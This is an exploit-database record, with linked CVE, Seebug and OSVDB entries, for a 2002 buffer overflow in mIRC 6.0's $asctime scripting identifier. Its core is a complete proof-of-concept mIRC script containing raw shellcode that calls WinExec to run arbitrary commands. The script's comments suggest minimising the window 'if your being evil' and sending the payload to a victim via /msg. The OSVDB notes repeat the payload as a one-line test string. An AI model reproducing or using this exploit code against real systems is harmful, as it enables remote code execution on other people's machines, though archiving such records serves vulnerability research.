mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability

{"bulletinFamily": "exploit", "id": "EDB-ID:21759", "cvelist": ["CVE-2002-1456"], "modified": "2002-08-27T00:00:00", "lastseen": "2016-02-02T17:12:26", "edition": 1, "sourceData": "source: http://www.securityfocus.com/bid/5576/info\r\n\r\nmIRC is a chat client for the IRC protocol, designed for Microsoft Windows based operating systems. mIRC includes support for a scripting language.\r\n\r\nA buffer overflow vulnerability has been reported in the $asctime identifier, a function in the mIRC scripting language. The error lies in the handling over oversized format specifier strings.\r\n\r\nExploitation will rely on a script passing untrusted input to this function. Reportedly, no such script is included in the default installation of mIRC. \r\n\r\n; Proof of concept Code for asctime exploit\r\n; Author: James Martin\r\n; Website: http://www.uuuppz.com\r\n; Email: me@uuuppz.com\r\n;\r\n; Usage:\r\n; /asctime_poc notepad c:\\autoexec.nat\r\n; /asctime_poc command.com /c echo Your have been rooted > c:\\rooted.txt\r\n; etc :)\r\n;\r\n;\r\n/asctime_poc {\r\n; Set Show State\r\n;\r\n; Valid Values:\r\n; 1 - Show Normal (This will break a ctcp request)\r\n; 2 - Minimise (If your being evil... ;))\r\n; 3 - Maximise\r\nset %showstate 2\r\n\r\n; Build Coded Command String\r\nset %command $1-\r\nset %count 1\r\nunset %codedcommand\r\n:loop\r\nset %codedcommand %codedcommand $+ $chr($calc(128+$asc($mid(%command, %count, 1))))\r\nset %count $calc( %count + 1)\r\nif %count <= $len(%command) goto loop \r\n\r\n; Shell Code to Execute\r\n;\r\n; Detects mirc version, decodes the command string then calls winexec\r\nset %shellcode $chr(184) $+ PPP $+ $chr(255) $+ $chr(193) $+ $chr(224) $+ $chr(8) $+ $chr(193) $+ $chr(232) $+ $chr(8) $+ f $+ $chr(139) $+ $chr(24) $+ f $+ $chr(129) $+ $chr(251) $+ $chr(220) $+ qu $+ $chr(7) $+ $chr(184) $+ $chr(250) $+ $chr(253) $+ $chr(5) $+ $chr(255) $+ $chr(235) $+ $chr(19) $+ f $+ $chr(129) $+ $chr(251) $+ $str($chr(255),2) $+ u $+ $chr(7) $+ $chr(184) $+ $chr(190) $+ $chr(187) $+ $chr(4) $+ $chr(255) $+ $chr(235) $+ $chr(5) $+ $chr(184) $+ $chr(210) $+ $chr(129) $+ $chr(4) $+ $chr(255) $+ 5PPP $+ $chr(255) $+ $chr(235) $+ $chr(30) $+ Yj $+ $chr( %showstate ) $+ QIA $+ $chr(128) $+ 9 $+ $chr(255) $+ u $+ $chr(2) $+ $chr(235) $+ $chr(5) $+ $chr(128) $+ 1 $+ $chr(128) $+ $chr(235) $+ $chr(243) $+ $chr(128) $+ 1 $+ $chr(255) $+ $chr(255) $+ $chr(208) $+ ]]] $+ $chr(139) $+ $chr(229) $+ ] $+ $chr(195) $+ $chr(232) $+ $chr(221) $+ $str($chr(255),3) \r\n\r\n; Build Exploit String\r\nset %exploitstring %shellcode $+ %codedcommand $+ $chr(255) $+ $str(a, $calc(300-2- $len(%command))) $+ q $+ $chr(17) $+ $chr(64) \r\n\r\n; Run exploit string\r\n;\r\n; In the real world it would be more like\r\n; /msg muppet weirdcommand %exploitstring\r\necho 1 $asctime(%exploitstring)\r\n}\r\n", "published": "2002-08-27T00:00:00", "href": "https://www.exploit-db.com/exploits/21759/", "osvdbidlist": ["6405"], "reporter": "James Martin", "hash": "63b5078bd63fb1602eda3edb4e3c1a0f02f115c9f198b7c0bc02010a843b7094", "title": "mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability. CVE-2002-1456. Remote exploit for windows platform", "references": [], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21759/"}

{"result": {"cve": [{"id": "CVE-2002-1456", "type": "cve", "title": "CVE-2002-1456", "description": "Buffer overflow in mIRC 6.0.2 and earlier allows remote attackers to execute arbitrary code via a long $asctime value.", "published": "2003-06-09T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-1456", "cvelist": ["CVE-2002-1456"], "lastseen": "2017-04-18T15:49:51"}], "seebug": [{"id": "SSV-75580", "type": "seebug", "title": "mIRC 6.0 Scripting ASCTime Buffer Overflow Vulnerability", "description": "Summary: \n \nmIRC is an IRC chat client.< br/>mIRC$asctime identifier in the parse string is the lack of correct checking, a remote attacker could exploit this vulnerability to buffer overflow attack.< br/>mIRC provides scripting capabilities to extend the client capabilities, of which$asctime script identifier vulnerability exists, this script is used to format Unix type timestamp, the$asctime in processing an overly long string is missing the proper check, it can cause a buffer overflow, by making the$asctime calls carefully constructed string data may be in the client permissions on the system to execute arbitrary commands.< br/>mIRC included by default in the script does not call$asctime, but most of the IRC Server script download can call this identifier.< br/>\n", "published": "2014-07-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.seebug.org/vuldb/ssvid-75580", "cvelist": ["CVE-2002-1456"], "lastseen": "2016-07-27T13:37:34"}], "osvdb": [{"id": "OSVDB:6405", "type": "osvdb", "title": "mIRC asctime Input Overflow", "description": "## Vulnerability Description\nA remote overflow exists in mIRC. mIRC fails to limit paramters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code resulting in a loss of confidentiality and integrity.\n## Solution Description\nUpgrade to version 6.03 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):\n\nDisable scripts or check input on functions that use the asctime() function.\n\n## Short Description\nA remote overflow exists in mIRC. mIRC fails to limit paramters given to asctime(), resulting in a buffer overflow. With a specially crafted request, an attacker can cause the target machine to execute arbitrary code resulting in a loss of confidentiality and integrity.\n## Manual Testing Notes\n//echo uuuppz $asctime(\u00b8PPP\u00ff\u00c1\u00e0*10\u00c1\u00e8*10f<*30f\u0081\u00fb\u00dcqu*07\u00b8\u00fa\u00fd*05\u00ff\u00eb*23f\u0081\u00fb\u00ff\u00ffu*07\u00b8\u00be\u00bb*04\u00ff\u00eb*05\u00b8\u00d2\u0081*04\u00ff5PPP\u00ff\u00eb*36YjQIA\u20ac9\u00ffu\u00eb*05\u20ac1\u20ac\u00eb\u00f3\u20ac1\u00ff\u00ff\u00d0]]]<\u00e5]\u00c3\u00e8\u00dd\u00ff\u00ff\u00ff\u20ac\u00ffaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaq*21@)\n\n## References:\nVendor URL: http://www.mirc.co.uk\nOther Advisory URL: http://www.uuuppz.com/research/adv-002-mirc.htm\nOther Advisory URL: http://securitytracker.com/alerts/2002/Aug/1005148.html\nISS X-Force ID: 9970\n[CVE-2002-1456](https://vulners.com/cve/CVE-2002-1456)\nBugtraq ID: 5576\n", "published": "2002-08-16T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://vulners.com/osvdb/OSVDB:6405", "cvelist": ["CVE-2002-1456"], "lastseen": "2017-04-28T13:20:01"}]}}